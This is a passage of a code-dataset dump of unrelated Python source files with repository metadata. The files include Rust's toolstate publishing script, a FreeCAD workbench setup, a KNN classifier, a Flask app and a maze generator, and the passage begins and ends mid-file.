AppraisalJob.DoesNotExist:\n # no job has been created yet\n delay = cron_entry.next(timezone.localtime(now))\n last = now\n\n next_date = last + datetime.timedelta(seconds=delay)\n AppraisalJob.objects.create(rule=rule, start_date=next_date)\n\n\nclass PollAppraisalJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n jobs = AppraisalJob.objects.select_related('rule').filter(status=celery_states.PENDING, start_date__lte=now)\n\n for job in jobs.iterator():\n job.run()\n\n\nclass ScheduleConversionJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n\n # get rules without future jobs scheduled\n rules = ConversionRule.objects.filter(\n information_packages__isnull=False, information_packages__active=True,\n ).exclude(jobs__start_date__gte=now).exclude(frequency__exact='')\n\n for rule in rules.iterator():\n cron_entry = CronTab(rule.frequency)\n\n try:\n latest_job = rule.jobs.latest()\n delay = cron_entry.next(timezone.localtime(latest_job.start_date))\n last = latest_job.start_date\n except ConversionJob.DoesNotExist:\n # no job has been created yet\n delay = cron_entry.next(timezone.localtime(now))\n last = now\n\n next_date = last + datetime.timedelta(seconds=delay)\n ConversionJob.objects.create(rule=rule, start_date=next_date)\n\n\nclass PollConversionJobs(DBTask):\n track = False\n\n def run(self):\n now = timezone.now()\n jobs = ConversionJob.objects.select_related('rule').filter(status=celery_states.PENDING, start_date__lte=now)\n\n for job in jobs.iterator():\n job.run()\n","repo_name":"OskarPersson/ESSArch","sub_path":"ESSArch_Core/workflow/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"16777639187","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This script computes the new \"current\" toolstate for the toolstate repo (not to be\n# confused with publishing the test results, which happens in `src/bootstrap/toolstate.rs`).\n# It gets called from `src/ci/publish_toolstate.sh` when a new commit lands on `master`\n# (i.e., after it passed all checks on `auto`).\n\nfrom __future__ import print_function\n\nimport sys\nimport re\nimport os\nimport json\nimport datetime\nimport collections\nimport textwrap\ntry:\n import urllib2\n from urllib2 import HTTPError\nexcept ImportError:\n import urllib.request as urllib2\n from urllib.error import HTTPError\ntry:\n import typing # noqa: F401 FIXME: py2\nexcept ImportError:\n pass\n\n# List of people to ping when the status of a tool or a book changed.\n# These should be collaborators of the rust-lang/rust repository (with at least\n# read privileges on it). CI will fail otherwise.\nMAINTAINERS = {\n 'book': {'carols10cents'},\n 'nomicon': {'frewsxcv', 'Gankra', 'JohnTitor'},\n 'reference': {'Havvy', 'matthewjasper', 'ehuss'},\n 'rust-by-example': {'marioidival'},\n 'embedded-book': {'adamgreig', 'andre-richter', 'jamesmunns', 'therealprof'},\n 'edition-guide': {'ehuss'},\n 'rustc-dev-guide': {'spastorino', 'amanjeev', 'JohnTitor'},\n}\n\nLABELS = {\n 'book': ['C-bug'],\n 'nomicon': ['C-bug'],\n 'reference': ['C-bug'],\n 'rust-by-example': ['C-bug'],\n 'embedded-book': ['C-bug'],\n 'edition-guide': ['C-bug'],\n 'rustc-dev-guide': ['C-bug'],\n}\n\nREPOS = {\n 'book': 'https://github.com/rust-lang/book',\n 'nomicon': 'https://github.com/rust-lang/nomicon',\n 'reference': 'https://github.com/rust-lang/reference',\n 'rust-by-example': 'https://github.com/rust-lang/rust-by-example',\n 'embedded-book': 'https://github.com/rust-embedded/book',\n 'edition-guide': 'https://github.com/rust-lang/edition-guide',\n 'rustc-dev-guide': 'https://github.com/rust-lang/rustc-dev-guide',\n}\n\ndef load_json_from_response(resp):\n # type: (typing.Any) -> typing.Any\n content = resp.read()\n if isinstance(content, bytes):\n content_str = content.decode('utf-8')\n else:\n print(\"Refusing to decode \" + str(type(content)) + \" to str\")\n return json.loads(content_str)\n\n\ndef read_current_status(current_commit, path):\n # type: (str, str) -> typing.Mapping[str, typing.Any]\n '''Reads build status of `current_commit` from content of `history/*.tsv`\n '''\n with open(path, 'r') as f:\n for line in f:\n (commit, status) = line.split('\\t', 1)\n if commit == current_commit:\n return json.loads(status)\n return {}\n\n\ndef gh_url():\n # type: () -> str\n return os.environ['TOOLSTATE_ISSUES_API_URL']\n\n\ndef maybe_remove_mention(message):\n # type: (str) -> str\n if os.environ.get('TOOLSTATE_SKIP_MENTIONS') is not None:\n return message.replace(\"@\", \"\")\n return message\n\n\ndef issue(\n tool,\n status,\n assignees,\n relevant_pr_number,\n relevant_pr_user,\n labels,\n github_token,\n):\n # type: (str, str, typing.Iterable[str], str, str, typing.List[str], str) -> None\n '''Open an issue about the toolstate failure.'''\n if status == 'test-fail':\n status_description = 'has failing tests'\n else:\n status_description = 'no longer builds'\n request = json.dumps({\n 'body': maybe_remove_mention(textwrap.dedent('''\\\n Hello, this is your friendly neighborhood mergebot.\n After merging PR {}, I observed that the tool {} {}.\n A follow-up PR to the repository {} is needed to fix the fallout.\n\n cc @{}, do you think you would have time to do the follow-up work?\n If so, that would be great!\n ''').format(\n relevant_pr_number, tool, status_description,\n REPOS.get(tool), relevant_pr_user\n )),\n 'title': '`{}` no longer builds after {}'.format(tool, relevant_pr_number),\n 'assignees': list(assignees),\n 'labels': labels,\n })\n print(\"Creating issue:\\n{}\".format(request))\n response = urllib2.urlopen(urllib2.Request(\n gh_url(),\n request.encode(),\n {\n 'Authorization': 'token ' + github_token,\n 'Content-Type': 'application/json',\n }\n ))\n response.read()\n\n\ndef update_latest(\n current_commit,\n relevant_pr_number,\n relevant_pr_url,\n relevant_pr_user,\n pr_reviewer,\n current_datetime,\n github_token,\n):\n # type: (str, str, str, str, str, str, str) -> str\n '''Updates `_data/latest.json` to match build result of the given commit.\n '''\n with open('_data/latest.json', 'r+') as f:\n latest = json.load(f, object_pairs_hook=collections.OrderedDict)\n\n current_status = {\n os_: read_current_status(current_commit, 'history/' + os_ + '.tsv')\n for os_ in ['windows', 'linux']\n }\n\n slug = 'rust-lang/rust'\n message = textwrap.dedent('''\\\n 📣 Toolstate changed by {}!\n\n Tested on commit {}@{}.\n Direct link to PR: <{}>\n\n ''').format(relevant_pr_number, slug, current_commit, relevant_pr_url)\n anything_changed = False\n for status in latest:\n tool = status['tool']\n changed = False\n create_issue_for_status = None # set to the status that caused the issue\n\n for os_, s in current_status.items():\n old = status[os_]\n new = s.get(tool, old)\n status[os_] = new\n maintainers = ' '.join('@'+name for name in MAINTAINERS.get(tool, ()))\n # comparing the strings, but they are ordered appropriately:\n # \"test-pass\" > \"test-fail\" > \"build-fail\"\n if new > old:\n # things got fixed or at least the status quo improved\n changed = True\n message += '🎉 {} on {}: {} → {} (cc {}).\\n' \\\n .format(tool, os_, old, new, maintainers)\n elif new < old:\n # tests or builds are failing and were not failing before\n changed = True\n title = '💔 {} on {}: {} → {}' \\\n .format(tool, os_, old, new)\n message += '{} (cc {}).\\n' \\\n .format(title, maintainers)\n # See if we need to create an issue.\n # Create issue if things no longer build.\n # (No issue for mere test failures to avoid spurious issues.)\n if new == 'build-fail':\n create_issue_for_status = new\n\n if create_issue_for_status is not None:\n try:\n issue(\n tool, create_issue_for_status, MAINTAINERS.get(tool, ()),\n relevant_pr_number, relevant_pr_user, LABELS.get(tool, []),\n github_token,\n )\n except HTTPError as e:\n # network errors will simply end up not creating an issue, but that's better\n # than failing the entire build job\n print(\"HTTPError when creating issue for status regression: {0}\\n{1!r}\"\n .format(e, e.read()))\n except IOError as e:\n print(\"I/O error when creating issue for status regression: {0}\".format(e))\n except:\n print(\"Unexpected error when creating issue for status regression: {0}\"\n .format(sys.exc_info()[0]))\n raise\n\n if changed:\n status['commit'] = current_commit\n status['datetime'] = current_datetime\n anything_changed = True\n\n if not anything_changed:\n return ''\n\n f.seek(0)\n f.truncate(0)\n json.dump(latest, f, indent=4, separators=(',', ': '))\n return message\n\n\n# Warning: Do not try to add a function containing the body of this try block.\n# There are variables declared within that are implicitly global; it is unknown\n# which ones precisely but at least this is true for `github_token`.\ntry:\n if __name__ != '__main__':\n exit(0)\n\n cur_commit = sys.argv[1]\n cur_datetime = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')\n cur_commit_msg = sys.argv[2]\n save_message_to_path = sys.argv[3]\n github_token = sys.argv[4]\n\n # assume that PR authors are also owners of the repo where the branch lives\n relevant_pr_match = re.search(\n r'Auto merge of #([0-9]+) - ([^:]+):[^,]+, r=(\\S+)',\n cur_commit_msg,\n )\n if relevant_pr_match:\n number = relevant_pr_match.group(1)\n relevant_pr_user = relevant_pr_match.group(2)\n relevant_pr_number = 'rust-lang/rust#' + number\n relevant_pr_url = 'https://github.com/rust-lang/rust/pull/' + number\n pr_reviewer = relevant_pr_match.group(3)\n else:\n number = '-1'\n relevant_pr_user = 'ghost'\n relevant_pr_number = ''\n relevant_pr_url = ''\n pr_reviewer = 'ghost'\n\n message = update_latest(\n cur_commit,\n relevant_pr_number,\n relevant_pr_url,\n relevant_pr_user,\n pr_reviewer,\n cur_datetime,\n github_token,\n )\n if not message:\n print('')\n sys.exit(0)\n\n print(message)\n\n if not github_token:\n print('Dry run only, not committing anything')\n sys.exit(0)\n\n with open(save_message_to_path, 'w') as f:\n f.write(message)\n\n # Write the toolstate comment on the PR as well.\n issue_url = gh_url() + '/{}/comments'.format(number)\n response = urllib2.urlopen(urllib2.Request(\n issue_url,\n json.dumps({'body': maybe_remove_mention(message)}).encode(),\n {\n 'Authorization': 'token ' + github_token,\n 'Content-Type': 'application/json',\n }\n ))\n response.read()\nexcept HTTPError as e:\n print(\"HTTPError: %s\\n%r\" % (e, e.read()))\n raise\n","repo_name":"rust-lang/rust","sub_path":"src/tools/publish_toolstate.py","file_name":"publish_toolstate.py","file_ext":"py","file_size_in_byte":10163,"program_lang":"python","lang":"en","doc_type":"code","stars":87195,"dataset":"github-code","pt":"61"} +{"seq_id":"38001658428","text":"from math import sqrt\n\ndef pitagoras(a, b):\n h = sqrt(((a**2) + (b**2)))\n\n return h\n\ncat_a = int(input('Digite o valor do primeiro cateto: '))\ncat_b = int(input('Digite o valor do segundo cateto: '))\n\nresult = pitagoras(cat_a, cat_b)\n\nprint(f'O valor da hipotenusa desse triangulo é {result}')","repo_name":"JorgeRoniel/Curso-de-Python","sub_path":"seção_8/exercicios_s8/exer8.py","file_name":"exer8.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19934612498","text":"import os\nimport FreeCADGui as Gui\nimport FreeCAD as App\nfrom freecad.casat import *\nfrom freecad.casat.version import __version__\n\n\nclass casat_workbench(Gui.Workbench):\n \"\"\"\n class which gets initiated at starup of the gui\n \"\"\"\n\n #Constants for UI locations for toolboxes\n MENU = 1\n TOOLBAR = 2\n CONTEXT = 4\n\n #Workbench GUI-specific attributes\n MenuText = \"Casat\" # + str(__version__)\n ToolTip = \"Curve And Surface Additional Tools, a Freecad workbench\"\n Icon = os.path.join(ICONPATH, \"casat_wb.svg\")\n\n def __init__(self):\n \"\"\"Workbench Constructor\"\"\"\n self.toolbox = ['bspline_to_console']\n self.command_ui = {\n 'Casat': {\n 'gui': self.MENU + self.TOOLBAR + self.CONTEXT,\n 'cmd': ['casat_face_mapping', 'casat_flatten_face', 'casat_isocurves', 'to_console']\n },\n #'Casat': {\n #'gui': self.TOOLBAR,\n #'cmd': ['casat_flatten_face', 'casat_isocurves', 'to_console']\n #},\n #'Casat': {\n #'gui': self.CONTEXT,\n #'cmd': ['casat_flatten_face', 'casat_isocurves', 'to_console', ]\n #},\n 'Devel': {\n 'gui': self.TOOLBAR,\n 'cmd': ['to_console', 'bspline_to_console']\n },\n }\n\n def GetClassName(self):\n return \"Gui::PythonWorkbench\"\n\n def Initialize(self):\n \"\"\"\n This function is called at the first activation of the workbench.\n Import commands here\n \"\"\"\n message(\"Activation\\n\\n *** Welcome to CASAT workbench. ***\\nC.A.S.A.T -> Curve And Surface Additional Tools\\n\")\n #import commands here to be added to the user interface\n #from .gui.commands import my_command_1, my_command_2, my_command_3\n from .gui.commands import dev_tools\n from .gui.commands import face_isocurves\n from .gui.commands import face_flattening\n from .gui.commands import face_mapping\n\n #iterate the command toolboxes defined in __init__() and add\n #them to the UI according to the assigned location flags\n for _k, _v in self.command_ui.items():\n\n if _v['gui'] & self.TOOLBAR:\n self.appendToolbar(_k, _v['cmd'])\n\n if _v['gui'] & self.MENU:\n self.appendMenu(_k, _v['cmd'])\n\n if (_k == 'Devel') and FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Mod/Casat\").GetBool('Devel', False):\n self.appendToolbar(_k, _v['cmd'])\n\n def Activated(self):\n \"\"\"\n Workbench activation occurs when switched to\n \"\"\"\n pass\n\n def Deactivated(self):\n \"\"\"\n Workbench deactivation occurs when switched away from in the UI\n \"\"\"\n pass\n\n def ContextMenu(self, recipient):\n \"\"\"\n Right-click menu options\n \"\"\"\n #if recipient == \"View\":\n #contextlist = [\"adjacent_faces\",\"bspline_to_console\"] # list of commands\n #self.appendContextMenu(\"Curves\",contextlist)\n #elif recipient == \"Tree\":\n #contextlist = [] # list of commands\n #self.appendContextMenu(\"Curves\",contextlist)\n #Populate the context menu when it's called\n for _k, _v in self.command_ui.items():\n if _v['gui'] & self.CONTEXT:\n self.appendContextMenu(_k, _v['cmd'])\n\nGui.addWorkbench(casat_workbench())\n","repo_name":"tomate44/casat","sub_path":"freecad/casat/init_gui.py","file_name":"init_gui.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72703278274","text":"import os\nfrom flask import Flask\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom api.predictor.views import predictor\nfrom mongoengine import *\nfrom flask_cors import CORS\nfrom utils.CustomJsonEncoder import CustomJSONEncoder\n\n\napp = Flask(__name__)\napp.json_encoder = CustomJSONEncoder\n\nclient = connect(host=os.environ.get('MONGODB_URI'))\n\n# Settings\nCORS(app)\n\nSWAGGER_URL = '/api/docs'\nAPI_URL = '/static/swagger.json'\n\nswaggerui_blueprint = get_swaggerui_blueprint(\n SWAGGER_URL,\n API_URL,\n config={\n 'app_name': \"iContracts application\"\n },\n)\n\n\n@app.get('/')\ndef hello_world():\n return 'Hello, this is the API Rest for iContracts!'\n\n\napp.register_blueprint(swaggerui_blueprint)\napp.register_blueprint(predictor, url_prefix='/api/v1')\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"isa-group/iContracts","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26543175720","text":"from launcher import Launcher\nimport argparse\nimport json\n\n\ndef cvt_args2dict(args):\n filled_settings = {}\n for args_key, args_value in args._get_kwargs():\n if args_value:\n if args_key == 'anchors':\n args_value = json.loads(args_value)\n filled_settings[args_key] = args_value\n if len(filled_settings) == 0:\n return None\n return filled_settings\n\n\nif __name__ == '__main__':\n # 控制台可输入参数\n args_dict = {'launch_mode': ['--launch_mode', None, str, '指定启动模式'],\n 'dataset_dir': ['--dataset_dir', None, str, '训练数据目录'],\n 'valid_dir': ['--valid_dir', None, str, '验证数据目录'],\n 'test_dir': ['--test_dir', None, str, '测试数据目录'],\n 'net_path': ['--net_path', None, str, '网络保存路径'],\n 'anchors': ['--anchors', None, str, '目标参考框'],\n 'epochs': ['--epochs', None, int, '训练轮次'],\n 'batch_size': ['--batch_size', None, int, '训练批次大小'],\n 'is_new': ['--is_new', False, bool, '指定是否重头训练'],\n 'log_dir': ['--log_dir', None, str, 'Loss画图保存地址'],\n 'plot_interval': ['--plot_interval', None, int, 'Loss画图的间隔'],\n 'save_loss_plot': ['--save_loss_plot', False, bool, '是否保存Loss画图'],\n 'plot_pause': ['--plot_pause', None, float, '画图暂定时长'],\n 'plot_loss': ['--plot_loss', False, bool, '是否可视化Loss'],\n 'optimizer': ['--optimizer', None, str, '优化器指定,默认为Adam']}\n parser = argparse.ArgumentParser(description='Hyperparams')\n for args_key, args_list in args_dict.items():\n parser.add_argument(args_list[0], nargs='?', default=args_list[1], type=args_list[2], help=args_list[3])\n args = parser.parse_args()\n # 转换控制台输入的参数为dict\n filled_settings = cvt_args2dict(args)\n runner = Launcher(filled_settings)\n runner.run()\n","repo_name":"EinKung/YoloTiny","sub_path":"train_console.py","file_name":"train_console.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41887761606","text":"from __future__ import division\nimport operator\nimport pandas as pd\nimport numpy as np\nimport argparse\nfrom ConfusionMatrix import confusionMatrix, plotConfusionMatrix\n\n\ndef readData(file):\n '''\n reads the content of the file and returns X(features) and Y(labels)\n :param file: name of the file\n :return: features, labels\n '''\n dataset = pd.read_csv(file, header=None)\n data_shuffled = dataset.sample(frac=1)\n\n X = data_shuffled.iloc[:, 0:4].values\n Y = data_shuffled.iloc[:, 4].values\n #return X.reshape((-1,4)), Y.reshape((-1,1))\n return X.reshape((-1,4)), Y\n\ndef euclideanDistance(p1,p2):\n '''\n calculation of euclidean distance\n :param p1:\n :param p2:\n :return:\n '''\n dist = np.sqrt(np.sum((p1 - p2) ** 2))\n return dist\n\ndef cosineSimilarity(p1,p2):\n '''\n calculation of cosine similarity\n :param p1:\n :param p2:\n :return:\n '''\n cos = np.dot(p1, p2) / (np.sqrt(np.dot(p1, p1)) * np.sqrt(np.dot(p2, p2)))\n return cos\n\n\ndef nearestNeighbors(X_train, Y_train, x_test_sample, k, metric):\n '''\n evaluates K nearest neighbors for the given test sample\n :param X_train: Training set features\n :param Y_train: Training set labels\n :param x_test_sample: features/attributes of a test sample\n :param k: K-nearest neighbors\n :param metric: distance metric, either euclidean or cosine\n :return: list of K nearest neighbors\n '''\n distances = []\n\n if metric == 'euclidean':\n for i in range(len(X_train)):\n distance = euclideanDistance(X_train[i], x_test_sample)\n distances.append((distance, Y_train[i]))\n distances.sort(key=operator.itemgetter(0))\n\n elif metric == 'cosine':\n for i in range(len(X_train)):\n distance = cosineSimilarity(X_train[i], x_test_sample)\n distances.append((distance, Y_train[i]))\n distances.sort(key=operator.itemgetter(0), reverse=True)\n\n else:\n for i in range(len(X_train)):\n distance = euclideanDistance(X_train[i], x_test_sample)\n distances.append((distance, Y_train[i]))\n distances.sort(key=operator.itemgetter(0))\n\n nearestNeighbors = distances[:k]\n return nearestNeighbors\n\ndef getPredictedClass(neighbors):\n '''\n :param neighbors: list of neighbors\n :return: nearest neighbor or predicted class\n '''\n counter = {}\n for item in neighbors:\n class_type = item[1]\n if class_type in counter:\n counter[class_type] +=1\n else:\n counter[class_type] = 1\n nearestNeighbor = max(counter.items(), key = operator.itemgetter(1))[0]\n return nearestNeighbor\n\n\ndef getAccuracy(true_labels, predictions):\n '''\n calculates accuracy\n :param true_labels:\n :param predictions:\n :return: returns accuracy\n '''\n result = list(map(lambda x,y: (1 if x==y else 0), predictions, true_labels))\n accuracy = sum(result)/(len(result))\n return accuracy\n\ndef knn(X_train, Y_train, X_test, Y_test, k=3, metric=\"euclidean\"):\n '''\n Implementation of K-Nearest Neighbors\n :param X_train: Training set features\n :param Y_train: Training set labels\n :param X_test: Test set features\n :param Y_test: Test set labels\n :param k: K-nearest neighbors\n :param metric: distance metric, either euclidean or cosine\n :return: accuracy, confusion matrix and list of unique classes\n '''\n predictions = []\n for i in range(len(X_test)):\n neighbors = nearestNeighbors(X_train, Y_train, X_test[i], k, metric)\n predicted_class = getPredictedClass(neighbors)\n predictions.append(predicted_class)\n #print(predicted_class, Y_test[i])\n accuracy = getAccuracy(Y_test, predictions)\n cm, classes = confusionMatrix(Y_test, predictions)\n return accuracy, cm, classes\n\ndef knnWithCrossValidation(X,Y, k=3, cv=5, metric=\"euclidean\"):\n '''\n KNN with cross validation\n :param X: Features\n :param Y: Labels\n :param k: K-nearest neighbors\n :param cv: n-fold cross-validation\n :param metric: distance metric, either euclidean or cosine\n :return: average-accuracy, average-confusion matrix and list of unique classes\n '''\n\n accuracies = []\n confusion_matrices = []\n num_samples = len(X)\n length_test = int((1/cv)*num_samples)\n u = 0\n v = length_test\n for i in range(cv):\n print(\"********************************************************************\\n\"\n \"Iteration {0} of {1}-fold cross-validation\".format(i + 1, cv))\n\n #print(\"u:\", u, \"v:\", v)\n X_test = X[u:v]\n X_train = np.concatenate((X[0:u], X[v:num_samples]), axis=0)\n Y_test = Y[u:v]\n Y_train = np.concatenate((Y[0:u], Y[v:num_samples]), axis=0)\n u = u + length_test\n v = v + length_test\n accuracy, cm, classes = knn(X_train, Y_train, X_test, Y_test, k, metric)\n\n accuracies.append(accuracy)\n confusion_matrices.append(cm)\n\n print(\"=>Accuracy: \", accuracy)\n print(\"=>Confusion Matrix:\\n \"\n \"{0}\\n\"\n \"{1}\\n\".format(classes, cm))\n\n #print(accuracies)\n average_accuracy = sum(accuracies) / len(accuracies)\n sum_cm = 0\n for cm in confusion_matrices:\n sum_cm = sum_cm + cm\n average_cm = sum_cm/len(confusion_matrices)\n\n return average_accuracy, average_cm, classes\n\n\ndef main():\n parser = argparse.ArgumentParser(description = 'KNN Classifier')\n parser.add_argument('-k', help='Number of nearest neighbors', type=int, required=True)\n parser.add_argument('-m', help='Distance/Similarity Metric',type=str, required=True)\n args = parser.parse_args()\n k = args.k\n metric = args.m\n\n\n print(\"Loading Dataset...\")\n X, Y = readData(\"iris.data\")\n print(\"Completed!\")\n accuracy, cm, classes = knnWithCrossValidation(X,Y, k=k, cv=5, metric=metric.lower())\n print(\"***KNN Classifier (with 5 fold cross validation)***\")\n print(\"Parameters:\"\n \"\\n\\tNearest Neighbors (k): {0}\"\n \"\\n\\tDistance Metric : {1}\".format(k, metric))\n print(\"=>Overall accuracy: \", accuracy)\n print(\"=>Overall Confusion Matrix:\\n \"\n \"{0}\\n\"\n \"{1}\\n\".format(classes, cm))\n print(\"Plotting Confusion Matrix...\")\n plotConfusionMatrix(cm, classes,\n normalize=True,\n title=\"Confusion Matrix: KNN Classifier\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"sdevkota007/KNN-And-NaiveBayes-Classifier","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72535332033","text":"'''\r\nDescription: \r\nVersion: \r\nAuthor: Leidi\r\nDate: 2021-07-09 10:19:01\r\nLastEditors: Leidi\r\nLastEditTime: 2021-08-05 16:57:33\r\n'''\r\n# -*- coding:utf-8 -*-\r\nimport argparse\r\nimport os\r\n\r\nfrom utils.utils import *\r\nfrom utils.distribution_function import *\r\n\r\n\r\ndef distribution(output_path):\r\n \"\"\"分析数据集的分布,包含total、train、val、test\"\"\"\r\n\r\n ImageSets_input_path = check_output_path(os.path.join(\r\n output_path, 'ImageSets')) # 获取数据集ImageSets路径\r\n class_path = check_output_path(ImageSets_input_path, 'classes.names') # 获取数据集类别文件路径 \r\n \r\n class_list = get_class(class_path)\r\n \r\n ttvt_path_list, label_input_path = get_path(output_path) # 获取不同set的txt文件路径列表\r\n every_set_label_list = get_one_set_label_path_list(ttvt_path_list) # 获取每个set.txt文件下图片的标签地址列表 \r\n set_count_dict_list, set_prop_dict_list = make_each_class_count_dict(label_input_path, every_set_label_list, class_list, ImageSets_input_path) #生成不同set的计数字典 \r\n drow(set_count_dict_list, set_prop_dict_list, class_list, ImageSets_input_path) # 在同图片中绘制不同set类别分布柱状图\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(prog='cleaning_7_distribution.py')\r\n parser.add_argument('--out', default=r'/home/leidi/Dataset/hy_highway_myxb_sjt_coco2017_7_classes_output_20210805',\r\n type=str, help='output path')\r\n opt = parser.parse_args()\r\n\r\n output_path = check_output_path(opt.out)\r\n\r\n print('\\nStart to distribution dataset:')\r\n distribution(output_path)\r\n print('Dataset analyze done!')\r\n\r\n","repo_name":"leidi1989/2D_Dataset_clean","sub_path":"Tool/Dataset_cleaning/cleaning_7_distribution.py","file_name":"cleaning_7_distribution.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272778936","text":"from aquilon.aqdb.model import SrvRecord\nfrom aquilon.worker.broker import BrokerCommand # pylint: disable=W0611\n\n\nclass CommandUpdateSrvRecord(BrokerCommand):\n\n required_parameters = [\"service\", \"protocol\", \"dns_domain\", \"target\"]\n\n def render(self, session, service, protocol, dns_domain, target,\n priority, weight, port, comments, dns_environment, **kwargs):\n name = \"_%s._%s\" % (service.strip().lower(), protocol.strip().lower())\n dbsrv_rec = SrvRecord.get_unique(session, name=name,\n dns_domain=dns_domain,\n dns_environment=dns_environment,\n target=target, compel=True)\n\n if priority:\n dbsrv_rec.priority = priority\n if weight:\n dbsrv_rec.weight = weight\n if port:\n dbsrv_rec.port = port\n if comments is not None:\n dbsrv_rec.comments = comments\n\n session.flush()\n return\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/commands/update_srv_record.py","file_name":"update_srv_record.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"70709405956","text":"IN_BLENDER = True\n\nimport random\n\nif IN_BLENDER:\n from . import weira\n from .trees import Tree\n from .progress_display import BlenderProgress\n from .logging_setup import setup_logger\nelse:\n import weira\n from trees import Tree\n from time import sleep\n from logging_setup import setup_logger\n\nlogger = setup_logger(__name__)\n\n\ndef round_avg(x1, x2):\n return round((x1 + x2) / 2)\n\n\ndef avg(x1, x2):\n return (x1 + x2) / 2\n\n\ndef find_all(lst, value):\n return [i for i, a in enumerate(lst) if a == value]\n\n\nclass Maze:\n \"\"\"The wrapper object for storing a maze.\n\n Methods:\n __init__ - Sets up maze, width, and height, then calls make_base_grid to setup grid.\n __len__ - Override for python len().\n make_base_grid - Sets up self.maze with grid based on x and y dimensions.\n get_maze - Returns maze.\n is_path - Returns if space defined by x and y is a path.\n make_path - Makes the space defined by x and y a path.\n make_wall - Makes the space defined by x and y a wall.\n find_touching - (static) Finds the spaces that touch x and y separated by 'dist'.\n exist_test - Checks if ordered pair exists within maze size.\n find_touching_path_dirs - Returns the directions in which there is a path adjacent to space (x, y), separated by given distance.\n find_exist_touching - Finds the spaces that touch x and y separated by 'dist'.\n \"\"\"\n def __init__(self, width, height, walls=True):\n \"\"\"Sets up maze, width, and height, then calls make_base_grid to setup grid.\"\"\"\n self.maze = []\n self.width = width\n self.height = height\n\n self.make_base_grid(walls)\n\n def __len__(self):\n \"\"\"Override for python len().\"\"\"\n return len(self.maze)\n\n def make_base_grid(self, walls):\n \"\"\"Sets up self.maze with grid based on x and y dimensions.\n\n Args:\n walls - make all spaces in the grid walls, False = make all spaces paths\n \"\"\"\n for column in range(0, self.width):\n self.maze.append([])\n for row in range(0, self.height):\n if walls:\n self.maze[column].append(0)\n else:\n self.maze[column].append(1)\n\n def get_maze(self):\n \"\"\"Returns maze.\"\"\"\n return self.maze\n\n def is_path(self, x, y):\n \"\"\"Returns if space defined by x and y is a path.\"\"\"\n return self.maze[x][y]\n\n def make_path(self, x, y):\n \"\"\"Makes the space defined by x and y a path.\"\"\"\n self.maze[x][y] = 1\n\n def make_wall(self, x, y):\n \"\"\"Makes the space defined by x and y a wall.\"\"\"\n self.maze[x][y] = 0\n\n @staticmethod\n def find_touching(x, y, dist=1):\n \"\"\"Finds the spaces that touch x and y separated by 'dist'.\n\n Args:\n x - (int) the x coordinate of the ordered pair to check\n y - (int) the y coordinate of the ordered pair to check\n dist - (int) distance from 'space' to check\n\n ---------------------\n | | | 2 | | |\n ---------------------\n | | | 1 | | |\n ---------------------\n | 2 | 1 | # | 1 | 2 |\n ---------------------\n | | | 1 | | |\n ---------------------\n | | | 2 | | |\n ---------------------\n\n Returns:\n (list of tuples) ordered pairs of touching spaces\n \"\"\"\n return [(x, y + dist), (x - dist, y), (x + dist, y), (x, y - dist)]\n\n def exist_test(self, x, y):\n \"\"\"Checks if ordered pair exists within maze size.\n\n Args:\n x - (int) the x coordinate of the ordered pair to check\n y - (int) the y coordinate of the ordered pair to check\n\n Returns:\n (boolean) exists\n \"\"\"\n exists = False\n # check that x and y are within maze bounds\n if self.width > x >= 0 and self.height > y >= 0:\n exists = True\n\n return exists\n\n def find_touching_path_dirs(self, x, y, dist=1):\n \"\"\"Returns the directions in which there is a path adjacent to space (x, y), separated by given distance.\n\n Args:\n x - (int) the x coordinate of space to use as the reference point\n y - (int) the y coordinate of space to use as the reference point\n dist - (int) the distance from the reference to check if the space is a path\n\n Returns:\n (tuple of strings) all directions in which there is an adjacent path, sep. by dist (in order N, W, E, S)\n \"\"\"\n touching = self.find_touching(x, y, dist)\n dirs = ('N', 'W', 'E', 'S')\n directions = []\n for i, t in enumerate(touching):\n # verify existence to avoid IOR Error\n if not self.exist_test(t[0], t[1]):\n continue\n # add the corresponding direction to the list\n if self.is_path(t[0], t[1]):\n directions += dirs[i]\n return directions\n\n def find_exist_touching(self, x, y, dist=1):\n \"\"\"Finds the spaces that touch x and y separated by 'dist'.\n\n Args:\n x - the x coordinate of space to base it off of\n y - the y coordinate of space to base it off of\n dist - distance from 'space' to check\n\n ---------------------\n | | | 2 | | |\n ---------------------\n | | | 1 | | |\n ---------------------\n | 2 | 1 | # | 1 | 2 |\n ---------------------\n | | | 1 | | |\n ---------------------\n | | | 2 | | |\n ---------------------\n\n Returns:\n a list of ordered pairs of touching spaces that exist\n \"\"\"\n directions = [(x, y - dist), (x + dist, y), (x, y + dist), (x - dist, y)]\n\n touching_xy = []\n for d in directions:\n if 